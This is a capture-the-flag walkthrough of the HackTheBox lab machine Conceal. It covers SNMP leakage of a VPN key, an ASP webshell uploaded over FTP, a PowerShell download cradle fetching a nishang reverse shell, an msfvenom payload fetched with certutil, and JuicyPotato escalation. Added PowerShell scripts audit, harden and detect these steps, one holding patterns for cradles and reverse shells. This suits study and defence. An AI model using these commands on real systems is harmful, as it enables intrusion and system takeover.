Conceal HackTheBox WalkThrough
This is the Conceal HackTheBox machine walkthrough, and it is also the 23rd machine of our OSCP-like HTB Boxes series. In this writeup I have demonstrated step by step how I rooted the Conceal HackTheBox machine. But before diving into the hacking part, let us know something about this box. It is a Windows OS machine with IP address 10.10.10.116 and difficulty hard assigned by its maker.
Since this machine is retired, you will require a VIP subscription at hackthebox.eu to access it. So first of all connect your Kali/Parrot machine to the HackTheBox VPN and confirm your connectivity by pinging its IP 10.10.10.116. If all goes well, start hacking. As usual I started by scanning the machine. Scanning gives us some idea of how to proceed further: it helps to find open and closed ports and gives information about the services running on them. I have used Nmap for this task and the result is given below:
Scanning
When I tried to perform a Stealth Scan (-sS) of all the ports it found no port open, because a firewall filters every TCP port and hence blocks the scan. Then I performed a UDP scan (-sU) and it found two ports open, both within the first 1000 ports.
$ sudo nmap -sU -sV -T4 -p1-1000 10.10.10.116
Nmap found UDP ports 161 and 500 open. An SNMP server is running on port 161 and ISAKMP (IKE) is running on port 500. Let us run nmap's default scripts (-sC) against these ports and see what they can find.
$ sudo nmap -sU -sC -T4 -p 500,161 10.10.10.116
The Nmap scan with default scripts revealed a lot of useful information. The snmp-netstat script revealed that many TCP ports are listening. The ike-version script reported the Conceal OS as Windows Server 8. Since port 500 is open and an IKE VPN server is running on it, we can reach those listening TCP ports only after connecting to the IKE VPN. So let us enumerate these two ports further to gather what we need for our VPN configuration file.
Our next step is to enumerate these two ports and gather as much information as we can. If you want more information, such as the number of users and their names, the exact OS version and service details of the Conceal machine, you can run the following nmap commands. They execute all the snmp and ike scripts present in the directory /usr/share/nmap/scripts/ against ports 161 and 500 respectively.
$ sudo nmap -sU -p161 --script snmp* 10.10.10.116
$ sudo nmap -sU -p500 --script ike* 10.10.10.116
We now have information about the different ports and the services running on them. Next let us use some service-specific tools to enumerate these ports further. For SNMP enumeration I have used snmp-check.pl (a Perl script to perform SNMP enumeration). Simply copy the content from here, save it in a file snmp-check.pl and run it as shown below. You can also use the Kali built-in tool snmpwalk for this purpose, but snmp-check.pl gives the information in a more human-readable form. I have used both tools to show you the result.
SNMP Enumeration ~ 161
$ snmpwalk -v 2c -c public 10.10.10.116
$ vi snmp-check.pl
$ perl snmp-check.pl -t 10.10.10.116 -p 161
Both tools found the IKE VPN PSK (pre-shared key) as a hash. When I tried to crack this hash on crackstation.net I got the password Dudecake1!.
IKE VPN password PSK – 9C8B1A372B1878851BE2C097031B6E43 : Dudecake1!
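The reason this step worked is that the SNMP agent answered the default community string public and the PSK hash was sitting in SNMP-readable data. As an added defender-side example (not part of the original walkthrough), the PowerShell below audits a Windows SNMP service for exactly those weaknesses: default or writable community strings and an empty permitted-managers list. It reads the registry keys the Windows SNMP service uses for its configuration; the permission value names are the standard ones for that service.

```powershell
# Added defender-side example: audit a Windows SNMP service for the weaknesses
# that exposed the PSK hash above. Not code from the original walkthrough.
# Registry locations are the standard ones used by the Windows SNMP service.
$snmpParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\SNMP\Parameters'

# Permission values the SNMP service stores per community string.
$permNames = @{ 1 = 'NONE'; 2 = 'NOTIFY'; 4 = 'READ ONLY'; 8 = 'READ WRITE'; 16 = 'READ CREATE' }
$defaultCommunities = @('public', 'private')

function Get-SnmpFindings {
    $findings = @()

    $communities = Get-ItemProperty -Path "$snmpParams\ValidCommunities" -ErrorAction SilentlyContinue
    if (-not $communities) {
        return @('No ValidCommunities key: SNMP service not installed or not configured')
    }
    # Get-ItemProperty adds PSPath/PSChildName/... metadata properties; skip those.
    $entries = $communities.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' }
    foreach ($entry in $entries) {
        $perm = [int]$entry.Value
        $permText = if ($permNames.ContainsKey($perm)) { $permNames[$perm] } else { "unknown ($perm)" }
        if ($defaultCommunities -contains $entry.Name.ToLower()) {
            $findings += "Default community string '$($entry.Name)' is enabled with $permText access"
        }
        if ($perm -ge 8) {
            $findings += "Community '$($entry.Name)' allows writes ($permText)"
        }
    }

    # PermittedManagers holds the hosts allowed to query the agent; empty means everyone.
    $managers = Get-ItemProperty -Path "$snmpParams\PermittedManagers" -ErrorAction SilentlyContinue
    $managerHosts = @()
    if ($managers) {
        $managerHosts = @($managers.PSObject.Properties |
            Where-Object { $_.Name -notlike 'PS*' } |
            ForEach-Object { $_.Value })
    }
    if ($managerHosts.Count -eq 0) {
        $findings += 'PermittedManagers is empty: any host may query the agent'
    }
    else {
        $findings += "Queries accepted from: $($managerHosts -join ', ')"
    }
    return $findings
}

Get-SnmpFindings
```

Run it as an administrator on the host under review. Anything it reports should be fixed by removing the default community strings, restricting PermittedManagers to the monitoring hosts, and retiring SNMP v1/v2c in favour of v3 where the monitoring stack supports it. Above all, never store a credential, or a hash of one, in any field that a read-only community can fetch.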
IPsec Enumeration ~ 500
ike-scan on port 500 revealed that the IKE version is v1, authentication uses a Pre-Shared Key and the encryption is 3DES. All this information is useful for writing the VPN configuration file.
$ sudo ike-scan -M 10.10.10.116
I am going to use the strongswan VPN client to connect to the VPN server running on the Conceal machine.
$ sudo apt install strongswan    # install on your Kali machine
You will also need to install these additional plugins:
$ sudo apt install libstrongswan-standard-plugins libstrongswan-extra-plugins
Once they are installed successfully, let us edit our VPN configuration file. Since we are going to connect over IPsec, we need to edit the IPsec configuration file, which is located in the /etc/ directory. Simply put the following in the ipsec.conf file, replacing left=10.10.14.9 with your tun0 IP.
$ tail -16 /etc/ipsec.conf
config setup
    charondebug="all"
    uniqueids=yes
    strictcrlpolicy=no

conn conceal
    authby=secret
    auto=add
    ike=3des-sha1-modp1024!
    esp=3des-sha1!
    type=transport
    keyexchange=ikev1
    left=10.10.14.9
    right=10.10.10.116
    rightsubnet=10.10.10.116[tcp]
Also put the following in the ipsec.secrets file, after changing 10.10.14.9 to your tun0 IP.
$ sudo head -3 /etc/ipsec.secrets
# This file holds shared secrets or RSA private keys for authentication.
10.10.14.9 10.10.10.116: PSK "Dudecake1!"
# RSA private key for this host, authenticating it to any other host
For more information on IPsec VPN configuration check this link. Let us connect to the VPN.
Connecting with IPsec VPN
$ sudo ipsec restart
$ sudo ipsec up conceal
$ sudo ipsec status
We are connected to the IPsec VPN. Let us run the Nmap scan again to check which ports are open now.
$ sudo nmap -sC -sV -sT -oA nmap/tcp_scan 10.10.10.116
Nmap found ports 21, 80, 135, 139 and 445 open. A Microsoft ftpd server is running on port 21 and the ftp-anon script revealed that anonymous login is allowed. So I immediately logged into it with the credentials anonymous : anonymous. After some enumeration I found that we can upload files to this server. To test this I created a simple text file test.txt and uploaded it, then tried to access the file at the URL http://10.10.10.116/test.txt.
We can't access the file there, so it may have been uploaded to some other folder. To find it I performed directory bruteforcing using the tool dirsearch and the wordlist small.txt, which is present in the directory /usr/share/wordlists/dirb/ on Kali/Parrot.
$ sudo dirsearch -w /usr/share/wordlists/dirb/small.txt -u http://10.10.10.116/ -e all -t 40 | tee dirsearch.out
Directory bruteforcing found a folder upload and our uploaded file is present in this folder. So the URL where we can access our uploaded file is http://10.10.10.116/upload/test.txt.
My next step is to upload a webshell so that we can execute commands on the Conceal machine and get a reverse shell back on our Kali machine. Since it is an IIS server I tried to upload aspx and asp webshells, because these are the file types IIS commonly executes. When I uploaded a webshell with the aspx extension it did not execute, because the aspx extension is blocked on the server. But when I uploaded an asp webshell and opened it in the browser it executed without trouble, and we can now run OS commands through it. The link to the webshell is this.
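Two things made the upload-and-execute path possible: an anonymous FTP account with write access to a directory the web server also serves, and a request-filtering policy that blocked .aspx but forgot .asp. As an added example from the defender's side (my code, not the box's configuration), the PowerShell below closes both gaps with the WebAdministration module. The site name 'Default Web Site', the FTP site name 'FTP Site' and the 'upload' folder are assumptions; adjust them to the server at hand.

```powershell
# Added defender-side example (not the box's configuration): stop uploaded
# files in the IIS upload directory from being executed, and stop anonymous
# FTP logons. Site names and the upload folder name are assumptions.
Import-Module WebAdministration

$site      = 'IIS:\Sites\Default Web Site'   # assumed web site name
$uploadDir = "$site\upload"                  # folder the FTP account could write to
$ftpSite   = 'IIS:\Sites\FTP Site'           # assumed FTP site name

# 1. Deny server-side script extensions at the site level via request filtering.
#    The box blocked .aspx but still served .asp, so deny the whole family.
$extFilter = 'system.webServer/security/requestFiltering/fileExtensions'
foreach ($ext in '.asp', '.aspx', '.ashx', '.asmx') {
    $existing = Get-WebConfigurationProperty -PSPath $site -Filter $extFilter -Name 'collection' |
        Where-Object { $_.fileExtension -eq $ext }
    if ($existing) {
        Set-WebConfigurationProperty -PSPath $site `
            -Filter "$extFilter/add[@fileExtension='$ext']" -Name 'allowed' -Value $false
    }
    else {
        Add-WebConfigurationProperty -PSPath $site -Filter $extFilter -Name '.' `
            -Value @{ fileExtension = $ext; allowed = $false }
    }
}

# 2. In the upload directory, let handlers serve files read-only: no Script or
#    Execute access, so nothing dropped there runs even if a new extension is
#    mapped to a script engine later.
Set-WebConfigurationProperty -PSPath $uploadDir -Filter 'system.webServer/handlers' `
    -Name 'accessPolicy' -Value 'Read'

# 3. Stop anonymous FTP logons; the anonymous write access is what made the
#    upload possible in the first place.
Set-ItemProperty -Path $ftpSite `
    -Name 'ftpServer.security.authentication.anonymousAuthentication.enabled' -Value $false

# Verify: denied extensions at the site, and the access policy on the upload folder.
Get-WebConfigurationProperty -PSPath $site -Filter $extFilter -Name 'collection' |
    Where-Object { -not $_.allowed } | Select-Object fileExtension, allowed
Get-WebConfigurationProperty -PSPath $uploadDir -Filter 'system.webServer/handlers' -Name 'accessPolicy'
```

Run it in an elevated PowerShell on the web server. The second step is the one that matters most: an extension deny-list is only as good as its completeness, whereas a Read-only handler access policy on the writable directory removes the execution path regardless of file name.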
Login into FTP & Uploading Webshell
$ ftp 10.10.10.116
~anonymous
~anonymous
$ put webshell.asp
After uploading access the webshell at http://10.10.10.116/upload/webshell.asp.
$ ipconfig
We have got Remote Code Execution on Conceal. Let us upgrade this to an interactive PowerShell so that we can work on the Conceal machine from a command prompt. For this I am using nishang's Invoke-PowerShellTcp.ps1 script. The repository link for nishang is this. First clone the repository into your /opt folder, then copy the file Invoke-PowerShellTcp.ps1 to a new file nishang.ps1 in the current directory and append Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4321 at the bottom of the nishang.ps1 file. Now start a python3 web server in the same folder to host this file, and in another window start a netcat listener on port 4321.
$ sudo git clone https://github.com/samratashok/nishang
$ cd /home/deepak/HTB/Boxes/Conceal
$ cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 nishang.ps1
$ echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4321' >> nishang.ps1
$ sudo python3 -m http.server 80
Now run
powershell "IEX(New-Object Net.webClient).downloadString('http://10.10.14.9/nishang.ps1')"
in the webshell, or alternatively open the URL
http://10.10.10.116/upload/webshell.asp?cmd=powershell+%22IEX(New-Object+Net.webClient).downloadString(%27http%3A%2F%2F10.10.14.9%2Fnishang.ps1%27)%22 to download nishang.ps1 and execute it on the Conceal machine.
$ nc -nvlp 4321
$ whoami
We have got an interactive PowerShell as user Destitute. Let us capture the user flag.
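The download cradle above (IEX plus Net.WebClient.DownloadString) and the nishang reverse shell leave a clear trace in PowerShell script block logging, Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log. The PowerShell below is an added detection example, not part of the original post: it matches script block text against patterns taken from the commands in this walkthrough, and it includes a constructed sample line so the matcher can be exercised on a host with no such events. It assumes script block logging is enabled by policy (PowerShell 5 auto-logs some suspicious blocks at warning level without it, but do not rely on that).

```powershell
# Added detection example (not from the original post): find PowerShell script
# blocks that look like the download cradle / reverse shell used on this box.
# Requires Script Block Logging (Event ID 4104) to be enabled by policy.
$patterns = @(
    'Net\.WebClient.*DownloadString',   # download-and-run cradle from the walkthrough
    'IEX\s*\(',                          # Invoke-Expression alias on downloaded text
    'Invoke-PowerShellTcp',              # nishang reverse shell function name
    'Net\.Sockets\.TCPClient'            # raw TCP client used by nishang shells
)
$cradleRegex = $patterns -join '|'       # -match is case-insensitive by default

function Test-SuspiciousScriptBlock {
    param([string]$Text)
    return [bool]($Text -match $cradleRegex)
}

function Get-SuspiciousScriptBlocks {
    param([int]$Hours = 24)
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # For event 4104, Properties[2] holds ScriptBlockText.
        $text = [string]$_.Properties[2].Value
        if (Test-SuspiciousScriptBlock $text) {
            $clean = $text -replace '\s+', ' '
            [pscustomobject]@{
                Time    = $_.TimeCreated
                User    = $_.UserId
                Snippet = $clean.Substring(0, [Math]::Min(120, $clean.Length))
            }
        }
    }
}

# Constructed sample, matching the command run through the webshell above,
# so the matcher can be checked without any events present.
$sample = "IEX(New-Object Net.webClient).downloadString('http://10.10.14.9/nishang.ps1')"
Test-SuspiciousScriptBlock $sample
Test-SuspiciousScriptBlock 'Get-ChildItem C:\Users'

Get-SuspiciousScriptBlocks -Hours 24 | Format-Table -AutoSize
```

On a host where this box's steps were reproduced, the first test returns True and the second False, and the log query surfaces both the cradle and the body of nishang.ps1 itself, since script block logging records the de-obfuscated text that actually ran. Pair it with alerting on w3wp.exe spawning cmd.exe or powershell.exe, which is the process-tree signature of a webshell.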
Capture User Flag
$ type C:\Users\Destitute\Desktop\proof.txt
Privilege Escalation
To escalate privileges to admin we first have to find a privilege escalation vector.
Finding PrivEsc Vector
$ whoami /priv
This command found that the token privilege SeImpersonatePrivilege is enabled. This is actually a vulnerability and can be exploited with the Juicy Potato exploit. For more info about this vulnerability check this link, and the Juicy Potato link is this. The link to the JuicyPotato.exe binary is this. When I exploited this machine using the Juicy Potato exploit I easily got an admin shell. So our potential PrivEsc vector here is Privilege Escalation through Access Token Manipulation. Check here for a HackTheBox machine with a similar PrivEsc vector.
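SeImpersonatePrivilege is granted by default to service accounts and to IIS application pool identities, so the escalation above is the expected outcome whenever attacker code runs inside a service. As an added example (my code, not the author's), the PowerShell below audits which accounts hold that right on a host, by exporting the local security policy with secedit and resolving the SIDs, and then lists the IIS application pool identities, which is the context a webshell runs in. The export path under $env:TEMP is my choice; the application pool step assumes IIS and its WebAdministration module are installed.

```powershell
# Added example (not the author's code): audit holders of SeImpersonatePrivilege
# and list IIS application pool identities. The export path is an assumption.
function Get-ImpersonatePrivilegeHolders {
    param([string]$ExportPath = (Join-Path $env:TEMP 'secpol-export.cfg'))

    # secedit writes the local security policy, including user rights, to an INF file.
    secedit /export /cfg $ExportPath | Out-Null
    $line = Get-Content -Path $ExportPath | Where-Object { $_ -match '^SeImpersonatePrivilege\s*=' }
    Remove-Item -Path $ExportPath -ErrorAction SilentlyContinue
    if (-not $line) { return @() }

    # Right-hand side looks like: *S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-32-544
    $entries = (($line -split '=', 2)[1]).Trim() -split ','
    foreach ($entry in $entries) {
        $entry = $entry.Trim()
        if ($entry.StartsWith('*')) {
            $sid = $entry.TrimStart('*')
            try {
                $account = (New-Object System.Security.Principal.SecurityIdentifier($sid)).Translate([System.Security.Principal.NTAccount]).Value
            }
            catch { $account = '(unresolved SID)' }
        }
        else {
            $sid = ''
            $account = $entry    # secedit sometimes writes names rather than SIDs
        }
        [pscustomobject]@{ Account = $account; Sid = $sid }
    }
}

function Get-AppPoolIdentities {
    # Requires IIS with the WebAdministration module. Pools running as LocalSystem,
    # LocalService, NetworkService or ApplicationPoolIdentity typically hold
    # SeImpersonatePrivilege, because the right is granted to the built-in
    # SERVICE group and to IIS_IUSRS.
    Import-Module WebAdministration -ErrorAction Stop
    Get-ChildItem -Path 'IIS:\AppPools' | ForEach-Object {
        [pscustomobject]@{
            AppPool      = $_.Name
            IdentityType = $_.processModel.identityType
            UserName     = $_.processModel.userName
        }
    }
}

'--- Accounts holding SeImpersonatePrivilege ---'
Get-ImpersonatePrivilegeHolders | Format-Table -AutoSize
'--- IIS application pool identities ---'
Get-AppPoolIdentities | Format-Table -AutoSize
```

Run it from an elevated prompt. The right cannot simply be stripped from service accounts without breaking IIS and other services, so the practical controls are keeping untrusted code out of those contexts (the FTP and request-filtering fixes earlier), running application pools under dedicated low-privilege identities rather than built-in service accounts, and alerting on unexpected child processes of w3wp.exe.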
To exploit this vulnerability we need a program that Juicy Potato will execute when we run the exploit. For this I created a shell.exe file with msfvenom that gives us a shell in msfconsole. So create shell.exe using msfvenom and send it to the Conceal machine.
Creating & Uploading Shell
On Kali Machine
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.9 LPORT=4567 --arch x64 -f exe > shell.exe
$ python3 -m http.server 8000
On Conceal Machine
$ cd C:\Users\Destitute
$ certutil.exe -split -urlcache -f "http://10.10.14.9:8000/shell.exe" "shell.exe"
$ certutil.exe -split -urlcache -f "http://10.10.14.9:8000/JuicyPotato.exe" "JuicyPotato.exe"
We have successfully downloaded both binaries to the Conceal machine. Let us get an admin shell by exploiting the vulnerability.
Getting Admin Shell
On Kali Machine
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST 10.10.14.9
msf6 exploit(multi/handler) > set LPORT 4567
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > exploit
meterpreter > getuid
meterpreter > sysinfo
On Conceal Machine
$ & "C:\Users\Destitute\JuicyPotato.exe" -l 1337 -p "C:\Users\Destitute\shell.exe" -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"
We are NT AUTHORITY\SYSTEM now, the highest privilege in Windows. Let us capture the root flag from the Administrator's directory.
Capture Root Flag
meterpreter > search -f proof.txt "C:\Users"
meterpreter > cat "c:\Users\Administrator\Desktop\proof.txt"
This was how I rooted the Conceal HackTheBox machine. I learnt a lot from this challenge and hope you have also learnt something new. Thanks for reading this walkthrough. For any query or suggestion feel free to write to us at [email protected].